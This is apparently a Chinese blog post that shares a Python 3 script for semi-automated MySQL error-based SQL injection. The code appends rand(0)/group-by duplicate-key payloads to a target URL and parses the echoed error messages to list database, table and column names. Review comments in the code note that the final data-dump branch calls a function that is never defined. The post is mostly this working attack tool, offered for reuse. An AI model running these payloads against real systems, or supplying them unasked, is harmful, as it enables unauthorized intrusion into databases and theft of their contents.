python脚本实现半自动化报错注入

贴一个python写的报错注入脚本,就当保存一下代码,以后可以回头参考参考。

运行环境:python3,并需要第三方库 requests(脚本中 `import requests`,标准库不自带,需 `pip install requests`)。脚本依赖目标页面把 MySQL 的报错信息原样回显出来,否则无法提取数据。

代码:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import re

parser=OptionParser()

parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

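def main():
    """Dispatch to the enumeration stage implied by the supplied switches.

    The stages nest: -U alone lists databases, -U -D lists that database's
    tables, -U -D -T lists that table's columns, and -U -D -T -C is meant to
    dump the column. Any invocation without a URL, or with a gap in the
    chain (for example -T without -D), prints the usage text and exits
    instead of silently doing nothing, which is what the original if/elif
    ladder did for every unlisted combination.
    """
    have_url = options.url is not None
    have_db = options.database is not None
    have_tb = options.table is not None
    have_co = options.column is not None

    if not have_url or (have_tb and not have_db) or (have_co and not have_tb):
        print("Please read the help")
        parser.print_help()
        sys.exit()

    if not have_db:
        get_all_databases(options.url)
    elif not have_tb:
        get_db_all_tables(options.url, options.database)
    elif not have_co:
        get_db_tb_all_columns(options.url, options.database, options.table)
    else:
        # NOTE(review): getAllContent is not defined anywhere in this file, so
        # this branch raises NameError as written -- the content-dump stage was
        # never implemented. Left in place rather than inventing a payload here.
        getAllContent(options.url, options.database, options.table, options.column)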

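def http_get(url, timeout=15):
    """Fetch *url* and return the response body as text.

    Args:
        url: Fully assembled request URL, injection payload included. It is
            sent as-is; requests percent-encodes the spaces in the payload.
        timeout: Seconds to wait for connect/read before giving up. The
            original passed no timeout, so a single stalled request could
            hang the whole enumeration loop indefinitely.

    Returns:
        The decoded response body. Non-2xx responses are returned, not
        raised: error-based injection depends on reading the database error
        out of whatever page the server sends back, which is often a 500.
    """
    result = requests.get(url, timeout=timeout)
    return result.text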


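def get_all_databases(url):
    """Enumerate schema names through a MySQL error-based injection.

    The payload appended to *url* uses the rand(0)/group-by duplicate-key
    trick: the subquery result is wrapped in 0x7e ('~') markers so the value
    can be pulled back out of the echoed error message with a regex. The
    count of schemata is fetched first, then one name per request.

    Args:
        url: Target URL with the injectable parameter already filled in;
            the payload is concatenated straight after it.

    Exits with a message (instead of crashing with AttributeError on
    ``None.group``) when the page does not echo a ``~...~`` pair, which is
    what happens when the target does not reflect database errors.
    """
    marker = re.compile(r'~(.*?)~', re.S | re.I)

    db_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)"
    match = marker.search(http_get(db_nums_payload))
    if match is None:
        sys.exit("响应中没有找到 ~...~ 报错回显,无法提取数据库个数(目标可能不回显 SQL 错误)")
    try:
        db_nums = int(match.group(1))
    except ValueError:
        # The regex takes the first ~...~ pair on the page, which need not be
        # the database error if the page itself contains tildes.
        sys.exit("提取到的不是数字:%r(可能匹配到了页面中无关的 ~...~ 文本)" % match.group(1))
    print("数据库的个数为:%d" % db_nums)

    for x in range(db_nums):
        # NOTE(review): MySQL truncates the value inside the duplicate-entry
        # error, so very long names may come back cut short -- verify against
        # the target's MySQL version.
        db_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select schema_name from information_schema.schemata limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % x
        match = marker.search(http_get(db_name_payload))
        if match is None:
            sys.exit("第%d个数据库名没有回显,提前结束" % (x + 1))
        print("第%d个数据库为:%s" % (x + 1, match.group(1)))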



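def get_db_all_tables(url, database):
    """Enumerate the table names of *database* via error-based injection.

    Same rand(0)/group-by duplicate-key payload as get_all_databases, with
    the schema name embedded as a hex literal (``0x...``) rather than a
    quoted string, so a quote inside the name cannot break the SQL and the
    payload needs no quote characters at all.

    Args:
        url: Target URL with the injectable parameter already filled in.
        database: Schema name as printed by get_all_databases.

    Exits with a message when the page does not echo a ``~...~`` pair.
    Also fixes the original's progress line, which said "数据库" where it
    meant "表".
    """
    marker = re.compile(r'~(.*?)~', re.S | re.I)
    # Hex literal needs no quoting; an empty name falls back to '' because a
    # bare 0x is not valid SQL.
    schema_lit = ("0x" + database.encode("utf-8").hex()) if database else "''"

    tb_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = %s),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % schema_lit
    match = marker.search(http_get(tb_nums_payload))
    if match is None:
        sys.exit("响应中没有找到 ~...~ 报错回显,无法提取表的个数(目标可能不回显 SQL 错误)")
    try:
        tb_nums = int(match.group(1))
    except ValueError:
        # First ~...~ pair on the page may be unrelated page text.
        sys.exit("提取到的不是数字:%r(可能匹配到了页面中无关的 ~...~ 文本)" % match.group(1))
    print(database, "数据库中表的个数为:%d" % tb_nums)

    for x in range(tb_nums):
        tb_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema = %s limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (schema_lit, x)
        match = marker.search(http_get(tb_name_payload))
        if match is None:
            sys.exit("第%d个表名没有回显,提前结束" % (x + 1))
        print(database, "数据库第%d个表为:%s" % (x + 1, match.group(1)))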



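def get_db_tb_all_columns(url, database, table):
    """Enumerate the column names of *database*.*table* via error-based injection.

    Same rand(0)/group-by duplicate-key payload as the other stages. Both
    the schema and table names are embedded as hex literals (``0x...``)
    instead of quoted strings, so names containing quotes cannot break the
    SQL and the payload carries no quote characters.

    Args:
        url: Target URL with the injectable parameter already filled in.
        database: Schema name as printed by get_all_databases.
        table: Table name as printed by get_db_all_tables.

    Exits with a message when the page does not echo a ``~...~`` pair.
    """
    marker = re.compile(r'~(.*?)~', re.S | re.I)
    # Hex literals need no quoting; an empty name falls back to '' because a
    # bare 0x is not valid SQL.
    schema_lit = ("0x" + database.encode("utf-8").hex()) if database else "''"
    table_lit = ("0x" + table.encode("utf-8").hex()) if table else "''"

    co_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = %s and table_name = %s),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (schema_lit, table_lit)
    match = marker.search(http_get(co_nums_payload))
    if match is None:
        sys.exit("响应中没有找到 ~...~ 报错回显,无法提取字段个数(目标可能不回显 SQL 错误)")
    try:
        co_nums = int(match.group(1))
    except ValueError:
        # First ~...~ pair on the page may be unrelated page text.
        sys.exit("提取到的不是数字:%r(可能匹配到了页面中无关的 ~...~ 文本)" % match.group(1))
    print("%s数据库中的%s表里面的字段个数为:%d" % (database, table, co_nums))

    for x in range(co_nums):
        co_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select column_name from information_schema.columns where table_schema = %s and table_name = %s limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (schema_lit, table_lit, x)
        match = marker.search(http_get(co_name_payload))
        if match is None:
            sys.exit("第%d个字段名没有回显,提前结束" % (x + 1))
        print("%s数据库中%s表中的第%d个字段为:%s" % (database, table, x + 1, match.group(1)))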


# Script entry point; importing the module only defines the functions (the
# option parsing above still runs at import time).
if __name__ == "__main__":
    main()

运行结果:

mark